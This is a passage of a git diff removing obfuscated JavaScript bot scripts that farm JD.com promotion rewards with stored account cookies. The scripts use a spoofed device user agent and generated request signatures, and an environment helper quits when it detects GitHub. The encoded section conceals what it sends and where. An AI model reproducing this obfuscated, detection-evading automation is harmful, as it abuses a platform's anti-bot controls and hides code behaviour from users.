_0x2bc631[_0x537f('‮39d','\x67\x36\x57\x4e')](_0x5636c9,_0x1ccabf);}};if(_0x2bc631[_0x537f('‮39e','\x42\x78\x58\x51')](_0x2bc631[_0x537f('‫39f','\x25\x72\x61\x32')],_0x2bc631[_0x537f('‮3a0','\x39\x29\x43\x49')])){Object[_0x537f('‮3a1','\x78\x75\x46\x50')](jdCookieNode)[_0x537f('‫3a2','\x47\x55\x21\x39')](_0x576562=>{cookiesArr[_0x537f('‮3a3','\x42\x52\x6d\x30')](jdCookieNode[_0x576562]);});if(process[_0x537f('‮3a4','\x4c\x52\x32\x62')][_0x537f('‮3a5','\x4e\x77\x4a\x29')]&&_0x1d684e[_0x537f('‮3a6','\x78\x75\x46\x50')](process[_0x537f('‮3a7','\x47\x41\x6c\x29')][_0x537f('‫3a8','\x42\x52\x6d\x30')],_0x1d684e[_0x537f('‮3a9','\x24\x51\x37\x78')]))console[_0x537f('‮235','\x29\x37\x50\x38')]=()=>{};}else{try{if(_0x51b3aa){if(_0x2bc631[_0x537f('‫3aa','\x46\x71\x33\x64')](_0x2bc631[_0x537f('‫3ab','\x73\x36\x26\x66')],_0x2bc631[_0x537f('‫3ac','\x37\x50\x30\x37')])){_0x5febf7=JSON[_0x537f('‮3ad','\x43\x73\x21\x37')](_0x5febf7);if(_0x1d684e[_0x537f('‮3ae','\x50\x71\x4a\x36')](_0x5febf7[_0x537f('‮3af','\x59\x4d\x24\x31')],'\x30')){$[_0x537f('‮3b0','\x37\x50\x30\x37')]=_0x5febf7[_0x537f('‫3b1','\x78\x75\x46\x50')];}}else{$[_0x537f('‮3b2','\x71\x2a\x6b\x35')](_0x51b3aa);}}else{if(_0x2bc631[_0x537f('‮3b3','\x26\x37\x4e\x4d')](_0x2bc631[_0x537f('‮3b4','\x4c\x52\x32\x62')],_0x2bc631[_0x537f('‫3b5','\x73\x21\x78\x6d')])){uuid=v[_0x537f('‮3b6','\x48\x32\x4d\x34')](0x24)[_0x537f('‫3b7','\x42\x5a\x6a\x6c')]();}else{if(_0x5febf7){_0x5febf7=JSON[_0x537f('‫3b8','\x44\x61\x6f\x44')](_0x5febf7);if(_0x2bc631[_0x537f('‮3b9','\x4a\x4c\x6d\x73')](_0x5febf7[_0x537f('‮3ba','\x47\x55\x21\x39')],_0x2bc631[_0x537f('‮3bb','\x67\x57\x44\x6e')])){if(_0x2bc631[_0x537f('‮3bc','\x59\x4d\x24\x31')](_0x2bc631[_0x537f('‫3bd','\x26\x37\x4e\x4d')],_0x2bc631[_0x537f('‮3be','\x44\x61\x6f\x44')])){$[_0x537f('‫3bf','\x42\x5a\x6a\x6c')]=_0x5febf7[_0x537f('‫220','\x4a\x4c\x6d\x73')][_0x537f('‫1d3','\x25\x72\x61\x32')];}else{$[_0x537f('‮3c0','\x47\x55\x21\x39')]=![];return;}}if(_0x2bc631[_0x537f('‮3c1','\x28\x26\x6c\x4a')](_0x5febf7[_0x537f('‮3c2','\x46\x71\x33\x64')],'\x30')&&_0x5febf7[_0x537f('‫1cb','\x74\x41\x72\x35')][_0x537f('‫3c3','\x4e\x59\x73\x4d')](_0x2bc631[_0x537f('‮3c4','\x78\x75\x46\x50')])){$[_0x537f('‮3c5','\x42\x5a\x6a\x6c')]=_0x5febf7[_0x537f('‫3c6','\x26\x37\x4e\x4d')][_0x537f('‮3c7','\x4e\x59\x73\x4d')][_0x537f('‮3c8','\x4c\x43\x4c\x76')][_0x537f('‮3c9','\x69\x71\x68\x37')];}}else{if(_0x2bc631[_0x537f('‫3ca','\x50\x71\x4a\x36')](_0x2bc631[_0x537f('‮3cb','\x26\x37\x4e\x4d')],_0x2bc631[_0x537f('‮3cc','\x73\x36\x26\x66')])){$[_0x537f('‫2b2','\x34\x24\x6a\x36')](_0x2bc631[_0x537f('‮3cd','\x24\x51\x37\x78')]);}else{if(_0x51b3aa){console[_0x537f('‮3ce','\x37\x50\x30\x37')](_0x51b3aa);}else{res=JSON[_0x537f('‫3cf','\x78\x75\x46\x50')](_0x5febf7);if(res[_0x537f('‫3d0','\x28\x26\x6c\x4a')]){console[_0x537f('‮235','\x29\x37\x50\x38')](res);$[_0x537f('‫3d1','\x48\x5e\x5a\x32')]=res[_0x537f('‫3d2','\x42\x5a\x6a\x6c')];}}}}}}}catch(_0x441ab2){if(_0x2bc631[_0x537f('‫3d3','\x67\x36\x57\x4e')](_0x2bc631[_0x537f('‫3d4','\x74\x41\x72\x35')],_0x2bc631[_0x537f('‮3d5','\x42\x78\x58\x51')])){$[_0x537f('‫3d6','\x4c\x43\x4c\x76')](_0x441ab2);}else{console[_0x537f('‫3d7','\x24\x51\x37\x78')](_0x51b3aa);}}finally{_0x2bc631[_0x537f('‮3d8','\x47\x41\x6c\x29')](_0x288dce);}}});});}function geth5st(_0x57834a,_0x30ad4a){var _0x2d0c4a={'\x76\x78\x6a\x4e\x52':_0x537f('‫3d9','\x67\x36\x57\x4e'),'\x4d\x64\x4c\x61\x66':function(_0x24712c,_0x2f3419){return _0x24712c!==_0x2f3419;},'\x4b\x63\x68\x41\x46':_0x537f('‮3da','\x73\x36\x26\x66'),'\x75\x6f\x59\x59\x65':_0x537f('‫3db','\x6b\x76\x2a\x41'),'\x74\x71\x67\x62\x41':function(_0x4d812d,_0x1f4b10){return _0x4d812d(_0x1f4b10);},'\x4b\x51\x63\x65\x46':_0x537f('‫3dc','\x25\x72\x61\x32'),'\x56\x63\x4c\x62\x41':_0x537f('‫3dd','\x42\x78\x58\x51'),'\x75\x4d\x61\x69\x59':_0x537f('‮3de','\x42\x78\x58\x51'),'\x77\x6f\x45\x6b\x57':_0x537f('‮3df','\x59\x4d\x24\x31'),'\x53\x42\x4a\x61\x53':function(_0x143874,_0x28c8cb){return _0x143874!==_0x28c8cb;},'\x56\x78\x69\x44\x73':_0x537f('‮3e0','\x71\x2a\x6b\x35'),'\x79\x4c\x51\x4f\x55':_0x537f('‫3e1','\x35\x53\x5e\x57'),'\x43\x78\x71\x75\x5a':function(_0x44980f,_0x4f7280){return _0x44980f!==_0x4f7280;},'\x55\x71\x4c\x6e\x61':_0x537f('‮3e2','\x42\x5a\x6a\x6c'),'\x4a\x4e\x62\x47\x71':_0x537f('‮3e3','\x21\x5d\x2a\x38'),'\x75\x6f\x61\x70\x61':function(_0x397115,_0x2cb9e7){return _0x397115*_0x2cb9e7;},'\x68\x6b\x77\x56\x66':_0x537f('‮3e4','\x61\x6c\x61\x53'),'\x49\x4c\x65\x47\x44':function(_0x2179a6,_0x1c6bb9){return _0x2179a6*_0x1c6bb9;}};return new Promise(async _0x22e802=>{let _0x31991a={'\x61\x70\x70\x49\x64':_0x2d0c4a[_0x537f('‫3e5','\x4c\x43\x4c\x76')],'\x62\x6f\x64\x79':{'\x61\x70\x70\x69\x64':_0x2d0c4a[_0x537f('‮3e6','\x29\x37\x50\x38')],'\x66\x75\x6e\x63\x74\x69\x6f\x6e\x49\x64':_0x57834a,'\x62\x6f\x64\x79':JSON[_0x537f('‫3e7','\x61\x57\x50\x78')](_0x30ad4a),'\x63\x6c\x69\x65\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e':_0x2d0c4a[_0x537f('‮3e8','\x48\x5e\x5a\x32')],'\x63\x6c\x69\x65\x6e\x74':'\x48\x35','\x61\x63\x74\x69\x76\x69\x74\x79\x49\x64':$[_0x537f('‫3e9','\x37\x50\x30\x37')]},'\x63\x61\x6c\x6c\x62\x61\x63\x6b\x41\x6c\x6c':!![]};let _0xc6a07f='';let _0x4f2161=[_0x2d0c4a[_0x537f('‫3ea','\x73\x21\x78\x6d')]];if(process[_0x537f('‫3eb','\x42\x52\x6d\x30')][_0x537f('‮3ec','\x38\x69\x75\x72')]){if(_0x2d0c4a[_0x537f('‫3ed','\x25\x72\x61\x32')](_0x2d0c4a[_0x537f('‫3ee','\x42\x5a\x6a\x6c')],_0x2d0c4a[_0x537f('‮3ef','\x47\x74\x6c\x6a')])){_0xc6a07f=process[_0x537f('‮3f0','\x5b\x53\x4c\x61')][_0x537f('‫3f1','\x42\x5a\x6a\x6c')];}else{_0xc6a07f=process[_0x537f('‮3f2','\x31\x26\x59\x5e')][_0x537f('‫3f3','\x39\x29\x43\x49')];}}else{if(_0x2d0c4a[_0x537f('‮3f4','\x4c\x43\x4c\x76')](_0x2d0c4a[_0x537f('‫3f5','\x26\x58\x58\x73')],_0x2d0c4a[_0x537f('‮3f6','\x61\x6c\x61\x53')])){_0xc6a07f=_0x4f2161[Math[_0x537f('‫3f7','\x69\x71\x68\x37')](_0x2d0c4a[_0x537f('‮3f8','\x42\x6d\x46\x4a')](Math[_0x537f('‫1ec','\x46\x71\x33\x64')](),_0x4f2161[_0x537f('‮3f9','\x44\x61\x6f\x44')]))];}else{$[_0x537f('‫10e','\x47\x41\x6c\x29')](_0x2d0c4a[_0x537f('‫3fa','\x4c\x58\x6d\x49')]);}}let _0x59509b={'\x75\x72\x6c':_0x537f('‫3fb','\x6b\x76\x2a\x41'),'\x62\x6f\x64\x79':JSON[_0x537f('‫3fc','\x69\x71\x68\x37')](_0x31991a),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0xc6a07f,'Content-Type':_0x2d0c4a[_0x537f('‮3fd','\x34\x24\x6a\x36')]},'\x74\x69\x6d\x65\x6f\x75\x74':_0x2d0c4a[_0x537f('‫3fe','\x71\x2a\x6b\x35')](0x1e,0x3e8)};$[_0x537f('‮3ff','\x26\x58\x58\x73')](_0x59509b,async(_0x472843,_0x4d46db,_0x31991a)=>{try{if(_0x2d0c4a[_0x537f('‫400','\x21\x6c\x36\x75')](_0x2d0c4a[_0x537f('‫401','\x39\x29\x43\x49')],_0x2d0c4a[_0x537f('‫402','\x26\x37\x4e\x4d')])){if(_0x472843){_0x31991a=await geth5st[_0x537f('‫403','\x78\x28\x63\x48')](this,arguments);}else{}}else{res=JSON[_0x537f('‫404','\x38\x69\x75\x72')](_0x31991a);if(res[_0x537f('‮405','\x59\x4d\x24\x31')]){if(res[_0x537f('‫406','\x39\x29\x43\x49')][_0x537f('‮407','\x47\x74\x6c\x6a')]){$[_0x537f('‮408','\x42\x6d\x46\x4a')]=res[_0x537f('‮409','\x48\x32\x4d\x34')][_0x537f('‫40a','\x67\x36\x57\x4e')][0x0][_0x537f('‫40b','\x4e\x59\x73\x4d')][_0x537f('‫40c','\x48\x5e\x5a\x32')];}}}}catch(_0x6fc8e3){$[_0x537f('‫40d','\x5e\x66\x72\x34')](_0x6fc8e3,_0x4d46db);}finally{_0x2d0c4a[_0x537f('‮40e','\x69\x71\x68\x37')](_0x22e802,_0x31991a);}});});};_0xodF='jsjiami.com.v6'; -// prettier-ignore -!function (n) { "use strict"; function t(n, t) { var r = (65535 & n) + (65535 & t); return (n >> 16) + (t >> 16) + (r >> 16) << 16 | 65535 & r } function r(n, t) { return n << t | n >>> 32 - t } function e(n, e, o, u, c, f) { return t(r(t(t(e, n), t(u, f)), c), o) } function o(n, t, r, o, u, c, f) { return e(t & r | ~t & o, n, t, u, c, f) } function u(n, t, r, o, u, c, f) { return e(t & o | r & ~o, n, t, u, c, f) } function c(n, t, r, o, u, c, f) { return e(t ^ r ^ o, n, t, u, c, f) } function f(n, t, r, o, u, c, f) { return e(r ^ (t | ~o), n, t, u, c, f) } function i(n, r) { n[r >> 5] |= 128 << r % 32, n[14 + (r + 64 >>> 9 << 4)] = r; var e, i, a, d, h, l = 1732584193, g = -271733879, v = -1732584194, m = 271733878; for (e = 0; e < n.length; e += 16)i = l, a = g, d = v, h = m, g = f(g = f(g = f(g = f(g = c(g = c(g = c(g = c(g = u(g = u(g = u(g = u(g = o(g = o(g = o(g = o(g, v = o(v, m = o(m, l = o(l, g, v, m, n[e], 7, -680876936), g, v, n[e + 1], 12, -389564586), l, g, n[e + 2], 17, 606105819), m, l, n[e + 3], 22, -1044525330), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 4], 7, -176418897), g, v, n[e + 5], 12, 1200080426), l, g, n[e + 6], 17, -1473231341), m, l, n[e + 7], 22, -45705983), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 8], 7, 1770035416), g, v, n[e + 9], 12, -1958414417), l, g, n[e + 10], 17, -42063), m, l, n[e + 11], 22, -1990404162), v = o(v, m = o(m, l = o(l, g, v, m, n[e + 12], 7, 1804603682), g, v, n[e + 13], 12, -40341101), l, g, n[e + 14], 17, -1502002290), m, l, n[e + 15], 22, 1236535329), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 1], 5, -165796510), g, v, n[e + 6], 9, -1069501632), l, g, n[e + 11], 14, 643717713), m, l, n[e], 20, -373897302), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 5], 5, -701558691), g, v, n[e + 10], 9, 38016083), l, g, n[e + 15], 14, -660478335), m, l, n[e + 4], 20, -405537848), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 9], 5, 568446438), g, v, n[e + 14], 9, -1019803690), l, g, n[e + 3], 14, -187363961), m, l, n[e + 8], 20, 1163531501), v = u(v, m = u(m, l = u(l, g, v, m, n[e + 13], 5, -1444681467), g, v, n[e + 2], 9, -51403784), l, g, n[e + 7], 14, 1735328473), m, l, n[e + 12], 20, -1926607734), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 5], 4, -378558), g, v, n[e + 8], 11, -2022574463), l, g, n[e + 11], 16, 1839030562), m, l, n[e + 14], 23, -35309556), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 1], 4, -1530992060), g, v, n[e + 4], 11, 1272893353), l, g, n[e + 7], 16, -155497632), m, l, n[e + 10], 23, -1094730640), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 13], 4, 681279174), g, v, n[e], 11, -358537222), l, g, n[e + 3], 16, -722521979), m, l, n[e + 6], 23, 76029189), v = c(v, m = c(m, l = c(l, g, v, m, n[e + 9], 4, -640364487), g, v, n[e + 12], 11, -421815835), l, g, n[e + 15], 16, 530742520), m, l, n[e + 2], 23, -995338651), v = f(v, m = f(m, l = f(l, g, v, m, n[e], 6, -198630844), g, v, n[e + 7], 10, 1126891415), l, g, n[e + 14], 15, -1416354905), m, l, n[e + 5], 21, -57434055), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 12], 6, 1700485571), g, v, n[e + 3], 10, -1894986606), l, g, n[e + 10], 15, -1051523), m, l, n[e + 1], 21, -2054922799), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 8], 6, 1873313359), g, v, n[e + 15], 10, -30611744), l, g, n[e + 6], 15, -1560198380), m, l, n[e + 13], 21, 1309151649), v = f(v, m = f(m, l = f(l, g, v, m, n[e + 4], 6, -145523070), g, v, n[e + 11], 10, -1120210379), l, g, n[e + 2], 15, 718787259), m, l, n[e + 9], 21, -343485551), l = t(l, i), g = t(g, a), v = t(v, d), m = t(m, h); return [l, g, v, m] } function a(n) { var t, r = "", e = 32 * n.length; for (t = 0; t < e; t += 8)r += String.fromCharCode(n[t >> 5] >>> t % 32 & 255); return r } function d(n) { var t, r = []; for (r[(n.length >> 2) - 1] = void 0, t = 0; t < r.length; t += 1)r[t] = 0; var e = 8 * n.length; for (t = 0; t < e; t += 8)r[t >> 5] |= (255 & n.charCodeAt(t / 8)) << t % 32; return r } function h(n) { return a(i(d(n), 8 * n.length)) } function l(n, t) { var r, e, o = d(n), u = [], c = []; for (u[15] = c[15] = void 0, o.length > 16 && (o = i(o, 8 * n.length)), r = 0; r < 16; r += 1)u[r] = 909522486 ^ o[r], c[r] = 1549556828 ^ o[r]; return e = i(u.concat(d(t)), 512 + 8 * t.length), a(i(c.concat(e), 640)) } function g(n) { var t, r, e = ""; for (r = 0; r < n.length; r += 1)t = n.charCodeAt(r), e += "0123456789abcdef".charAt(t >>> 4 & 15) + "0123456789abcdef".charAt(15 & t); return e } function v(n) { return unescape(encodeURIComponent(n)) } function m(n) { return h(v(n)) } function p(n) { return g(m(n)) } function s(n, t) { return l(v(n), v(t)) } function C(n, t) { return g(s(n, t)) } function A(n, t, r) { return t ? r ? s(t, n) : C(t, n) : r ? m(n) : p(n) } $.md5 = A }(this); -function Env(t, e) { "undefined" != typeof process && JSON.stringify(process.env).indexOf("GITHUB") > -1 && process.exit(0); class s { constructor(t) { this.env = t } send(t, e = "GET") { t = "string" == typeof t ? { url: t } : t; let s = this.get; return "POST" === e && (s = this.post), new Promise((e, i) => { s.call(this, t, (t, s, r) => { t ? i(t) : e(s) }) }) } get(t) { return this.send.call(this.env, t) } post(t) { return this.send.call(this.env, t, "POST") } } return new class { constructor(t, e) { this.name = t, this.http = new s(this), this.data = null, this.dataFile = "box.dat", this.logs = [], this.isMute = !1, this.isNeedRewrite = !1, this.logSeparator = "\n", this.startTime = (new Date).getTime(), Object.assign(this, e), this.log("", `🔔${this.name}, 开始!`) } isNode() { return "undefined" != typeof module && !!module.exports } isQuanX() { return "undefined" != typeof $task } isSurge() { return "undefined" != typeof $httpClient && "undefined" == typeof $loon } isLoon() { return "undefined" != typeof $loon } toObj(t, e = null) { try { return JSON.parse(t) } catch { return e } } toStr(t, e = null) { try { return JSON.stringify(t) } catch { return e } } getjson(t, e) { let s = e; const i = this.getdata(t); if (i) try { s = JSON.parse(this.getdata(t)) } catch { } return s } setjson(t, e) { try { return this.setdata(JSON.stringify(t), e) } catch { return !1 } } getScript(t) { return new Promise(e => { this.get({ url: t }, (t, s, i) => e(i)) }) } runScript(t, e) { return new Promise(s => { let i = this.getdata("@chavy_boxjs_userCfgs.httpapi"); i = i ? i.replace(/\n/g, "").trim() : i; let r = this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout"); r = r ? 1 * r : 20, r = e && e.timeout ? e.timeout : r; const [o, h] = i.split("@"), n = { url: `http://${h}/v1/scripting/evaluate`, body: { script_text: t, mock_type: "cron", timeout: r }, headers: { "X-Key": o, Accept: "*/*" } }; this.post(n, (t, e, i) => s(i)) }).catch(t => this.logErr(t)) } loaddata() { if (!this.isNode()) return {}; { this.fs = this.fs ? this.fs : require("fs"), this.path = this.path ? this.path : require("path"); const t = this.path.resolve(this.dataFile), e = this.path.resolve(process.cwd(), this.dataFile), s = this.fs.existsSync(t), i = !s && this.fs.existsSync(e); if (!s && !i) return {}; { const i = s ? t : e; try { return JSON.parse(this.fs.readFileSync(i)) } catch (t) { return {} } } } } writedata() { if (this.isNode()) { this.fs = this.fs ? this.fs : require("fs"), this.path = this.path ? this.path : require("path"); const t = this.path.resolve(this.dataFile), e = this.path.resolve(process.cwd(), this.dataFile), s = this.fs.existsSync(t), i = !s && this.fs.existsSync(e), r = JSON.stringify(this.data); s ? this.fs.writeFileSync(t, r) : i ? this.fs.writeFileSync(e, r) : this.fs.writeFileSync(t, r) } } lodash_get(t, e, s) { const i = e.replace(/\[(\d+)\]/g, ".$1").split("."); let r = t; for (const t of i) if (r = Object(r)[t], void 0 === r) return s; return r } lodash_set(t, e, s) { return Object(t) !== t ? t : (Array.isArray(e) || (e = e.toString().match(/[^.[\]]+/g) || []), e.slice(0, -1).reduce((t, s, i) => Object(t[s]) === t[s] ? t[s] : t[s] = Math.abs(e[i + 1]) >> 0 == +e[i + 1] ? [] : {}, t)[e[e.length - 1]] = s, t) } getdata(t) { let e = this.getval(t); if (/^@/.test(t)) { const [, s, i] = /^@(.*?)\.(.*?)$/.exec(t), r = s ? this.getval(s) : ""; if (r) try { const t = JSON.parse(r); e = t ? this.lodash_get(t, i, "") : e } catch (t) { e = "" } } return e } setdata(t, e) { let s = !1; if (/^@/.test(e)) { const [, i, r] = /^@(.*?)\.(.*?)$/.exec(e), o = this.getval(i), h = i ? "null" === o ? null : o || "{}" : "{}"; try { const e = JSON.parse(h); this.lodash_set(e, r, t), s = this.setval(JSON.stringify(e), i) } catch (e) { const o = {}; this.lodash_set(o, r, t), s = this.setval(JSON.stringify(o), i) } } else s = this.setval(t, e); return s } getval(t) { return this.isSurge() || this.isLoon() ? $persistentStore.read(t) : this.isQuanX() ? $prefs.valueForKey(t) : this.isNode() ? (this.data = this.loaddata(), this.data[t]) : this.data && this.data[t] || null } setval(t, e) { return this.isSurge() || this.isLoon() ? $persistentStore.write(t, e) : this.isQuanX() ? $prefs.setValueForKey(t, e) : this.isNode() ? (this.data = this.loaddata(), this.data[e] = t, this.writedata(), !0) : this.data && this.data[e] || null } initGotEnv(t) { this.got = this.got ? this.got : require("got"), this.cktough = this.cktough ? this.cktough : require("tough-cookie"), this.ckjar = this.ckjar ? this.ckjar : new this.cktough.CookieJar, t && (t.headers = t.headers ? t.headers : {}, void 0 === t.headers.Cookie && void 0 === t.cookieJar && (t.cookieJar = this.ckjar)) } get(t, e = (() => { })) { t.headers && (delete t.headers["Content-Type"], delete t.headers["Content-Length"]), this.isSurge() || this.isLoon() ? (this.isSurge() && this.isNeedRewrite && (t.headers = t.headers || {}, Object.assign(t.headers, { "X-Surge-Skip-Scripting": !1 })), $httpClient.get(t, (t, s, i) => { !t && s && (s.body = i, s.statusCode = s.status), e(t, s, i) })) : this.isQuanX() ? (this.isNeedRewrite && (t.opts = t.opts || {}, Object.assign(t.opts, { hints: !1 })), $task.fetch(t).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => e(t))) : this.isNode() && (this.initGotEnv(t), this.got(t).on("redirect", (t, e) => { try { if (t.headers["set-cookie"]) { const s = t.headers["set-cookie"].map(this.cktough.Cookie.parse).toString(); s && this.ckjar.setCookieSync(s, null), e.cookieJar = this.ckjar } } catch (t) { this.logErr(t) } }).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => { const { message: s, response: i } = t; e(s, i, i && i.body) })) } post(t, e = (() => { })) { if (t.body && t.headers && !t.headers["Content-Type"] && (t.headers["Content-Type"] = "application/x-www-form-urlencoded"), t.headers && delete t.headers["Content-Length"], this.isSurge() || this.isLoon()) this.isSurge() && this.isNeedRewrite && (t.headers = t.headers || {}, Object.assign(t.headers, { "X-Surge-Skip-Scripting": !1 })), $httpClient.post(t, (t, s, i) => { !t && s && (s.body = i, s.statusCode = s.status), e(t, s, i) }); else if (this.isQuanX()) t.method = "POST", this.isNeedRewrite && (t.opts = t.opts || {}, Object.assign(t.opts, { hints: !1 })), $task.fetch(t).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => e(t)); else if (this.isNode()) { this.initGotEnv(t); const { url: s, ...i } = t; this.got.post(s, i).then(t => { const { statusCode: s, statusCode: i, headers: r, body: o } = t; e(null, { status: s, statusCode: i, headers: r, body: o }, o) }, t => { const { message: s, response: i } = t; e(s, i, i && i.body) }) } } time(t, e = null) { const s = e ? new Date(e) : new Date; let i = { "M+": s.getMonth() + 1, "d+": s.getDate(), "H+": s.getHours(), "m+": s.getMinutes(), "s+": s.getSeconds(), "q+": Math.floor((s.getMonth() + 3) / 3), S: s.getMilliseconds() }; /(y+)/.test(t) && (t = t.replace(RegExp.$1, (s.getFullYear() + "").substr(4 - RegExp.$1.length))); for (let e in i) new RegExp("(" + e + ")").test(t) && (t = t.replace(RegExp.$1, 1 == RegExp.$1.length ? i[e] : ("00" + i[e]).substr(("" + i[e]).length))); return t } msg(e = t, s = "", i = "", r) { const o = t => { if (!t) return t; if ("string" == typeof t) return this.isLoon() ? t : this.isQuanX() ? { "open-url": t } : this.isSurge() ? { url: t } : void 0; if ("object" == typeof t) { if (this.isLoon()) { let e = t.openUrl || t.url || t["open-url"], s = t.mediaUrl || t["media-url"]; return { openUrl: e, mediaUrl: s } } if (this.isQuanX()) { let e = t["open-url"] || t.url || t.openUrl, s = t["media-url"] || t.mediaUrl; return { "open-url": e, "media-url": s } } if (this.isSurge()) { let e = t.url || t.openUrl || t["open-url"]; return { url: e } } } }; if (this.isMute || (this.isSurge() || this.isLoon() ? $notification.post(e, s, i, o(r)) : this.isQuanX() && $notify(e, s, i, o(r))), !this.isMuteLog) { let t = ["", "==============📣系统通知📣=============="]; t.push(e), s && t.push(s), i && t.push(i), console.log(t.join("\n")), this.logs = this.logs.concat(t) } } log(...t) { t.length > 0 && (this.logs = [...this.logs, ...t]), console.log(t.join(this.logSeparator)) } logErr(t, e) { const s = !this.isSurge() && !this.isQuanX() && !this.isLoon(); s ? this.log("", `❗️${this.name}, 错误!`, t.stack) : this.log("", `❗️${this.name}, 错误!`, t) } wait(t) { return new Promise(e => setTimeout(e, t)) } done(t = {}) { const e = (new Date).getTime(), s = (e - this.startTime) / 1e3; this.log("", `🔔${this.name}, 结束! 🕛 ${s} 秒`), this.log(), (this.isSurge() || this.isQuanX() || this.isLoon()) && $done(t) } }(t, e) } diff --git a/jd_mpdzcar.js b/jd_mpdzcar.js deleted file mode 100644 index b9c897b..0000000 --- a/jd_mpdzcar.js +++ /dev/null @@ -1,236 +0,0 @@ -/* -TG https://t.me/duckjobs - -活动入口:京东汽车 - 右下角 - 领京豆 -先跑积分,不要问为什么分开😂 - -10 8 * * * jd_mpdzcar.js -*/ -const $ = new Env("头文子J"); -const jdCookieNode = $.isNode() ? require('./jdCookie.js') : ''; -const notify = $.isNode() ? require('./sendNotify') : ''; -let cookiesArr = [], cookie = '' -actId = "1760007"; -if ($.isNode()) { - Object.keys(jdCookieNode).forEach((item) => { - cookiesArr.push(jdCookieNode[item]) - }) - if (process.env.JD_DEBUG && process.env.JD_DEBUG === 'false') console.log = () => { }; -} else { - let cookiesData = $.getdata('CookiesJD') || "[]"; - cookiesData = JSON.parse(cookiesData); - cookiesArr = cookiesData.map(item => item.cookie); - cookiesArr.reverse(); - cookiesArr.push(...[$.getdata('CookieJD2'), $.getdata('CookieJD')]); - cookiesArr.reverse(); - cookiesArr = cookiesArr.filter(item => !!item); -} -!(async () => { - if (!cookiesArr[0]) { - $.msg($.name, '【提示】请先获取京东账号一cookie\n直接使用NobyDa的京东签到获取', 'https://bean.m.jd.com/bean/signIndex.action', { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - return; - } - console.log("等待初始化任务..."+"\n活动入口:京东汽车 - 右下角 - 领京豆"+"\n请求太快容易繁忙,默认延迟5-10s"); - UUID = getUUID('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'); - for (let i = 0; i < cookiesArr.length; i++) { - UA = `jdapp;iPhone;10.1.6;13.5;${UUID};network/wifi;model/iPhone11,6;addressid/4596882376;appBuild/167841;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 13_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1`; - if (cookiesArr[i]) { - cookie = cookiesArr[i]; - $.UserName = decodeURIComponent(cookie.match(/pt_pin=(.+?);/) && cookie.match(/pt_pin=(.+?);/)[1]) - $.index = i + 1; - $.isLogin = true; - $.nickName = ''; - $.hotFlag = false; - await TotalBean(); - console.log(`\n******开始【京东账号${$.index}】${$.nickName || $.UserName}*********\n`); - if (!$.isLogin) { - $.msg($.name, `【提示】cookie已失效`, `京东账号${$.index} ${$.nickName || $.UserName}\n请重新登录获取\nhttps://bean.m.jd.com/bean/signIndex.action`, { "open-url": "https://bean.m.jd.com/bean/signIndex.action" }); - if ($.isNode()) { - await notify.sendNotify(`${$.name}cookie已失效 - ${$.UserName}`, `京东账号${$.index} ${$.UserName}\n请重新登录获取cookie`); - } - continue - } - await main(); - } - } -})().catch((e) => { $.log('', `❌ ${$.name}, 失败! 原因: ${e}!`, '') }).finally(() => { $.done(); }) - -async function main() { - $.token = ''; - await getToken(); - if ($.token) { - await taskPost('getFansInfo', { "data": $.token, "source": "01", "actId": actId }) - if ($.buyerNick) { - await taskPost('loadUnitedCardActivityInfo', { "actId": actId, "buyerNick": $.buyerNick }) - await taskPost('loadSignInState', { "actId": actId, "buyerNick": $.buyerNick }) - await $.wait(5000); - if ($.signInDay) { - $.log('去签到.. 第 '+$.signInDay+ '天') - await taskPost('signGetEnergy', { "actId": actId, "buyerNick": $.buyerNick, "energyValue": 100, "day": $.signInDay }) - - } - for (let i = 0; i < 3; i++) { - await $.wait(5000); - await taskPost('loadShopGroup', { "actId": actId, "buyerNick": $.buyerNick, "shopGroupType": "favouriteShop"}) - if ($.shopId) { - await $.wait(5000); - $.log('关注品牌店铺.. '+$.shopId) - await taskPost('favouriteShopSingle', { "actId": actId, "buyerNick": $.buyerNick, "shopId": $.shopId}) - } - } - $.log('浏览.. ') - await taskPost('participantBehavior', { "actId": actId, "buyerNick": $.buyerNick,"behavior":"browseShop"}) - await $.wait(5000); - await taskPost('participantBehavior', { "actId": actId, "buyerNick": $.buyerNick,"behavior":"carSelection"}) - await $.wait(5000); - await taskPost('participantBehavior', { "actId": actId, "buyerNick": $.buyerNick,"behavior":"refueling"}) - for (let i = 0; i < 3; i++) { - await $.wait(5000); - await taskPost('participantBehavior', { "actId": actId, "buyerNick": $.buyerNick,"behavior":"browseItem"}) - } - for (let i = 0; i < 3; i++) { - await $.wait(5000); - await taskPost('loadItemGroup', { "actId": actId, "buyerNick": $.buyerNick, "itemGroupType": "browseItem"}) - if ($.shopId) { - await $.wait(10000); - $.log('加购车.. '+$.shopId) - await taskPost('addItemSingle', { "actId": actId, "buyerNick": $.buyerNick, "itemId": $.itemId, "shopId": $.shopId}) - } - } - } else { - $.log("没有获取到用户信息") - } - } else { - $.log("没有成功获取到用户鉴权信息"); - } -} -function taskPost(function_id, body = {}) { - return new Promise(async resolve => { - $.post(taskPostUrl(function_id, body), async (err, resp, data) => { - try { - if (data) { - data = JSON.parse(data); - if (data) { - switch (function_id) { - case 'getFansInfo': - if (data.succ) { - $.buyerNick = data.msg; - } - break; - case 'loadUnitedCardActivityInfo': - break; - case 